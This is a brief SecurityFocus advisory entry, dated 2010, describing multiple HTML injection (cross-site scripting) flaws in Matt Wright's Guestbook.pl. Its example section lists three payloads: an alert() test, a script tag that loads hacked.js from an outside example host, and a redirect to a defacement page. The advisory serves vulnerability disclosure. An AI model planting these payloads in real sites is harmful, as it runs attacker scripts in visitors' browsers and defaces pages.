Matt Wright Guestbook Guestbook.PL Multiple HTML Injection Vulnerabilities


This issue can be exploited via a web client.


An example has been provided:

<script>alert(/Liz0ziM/)</script>

<script src=http://www.example.com/hacked.js></script>

<script>location.href="http://www.example.com/deface.html";</script>


 

Privacy Statement
Copyright 2010, SecurityFocus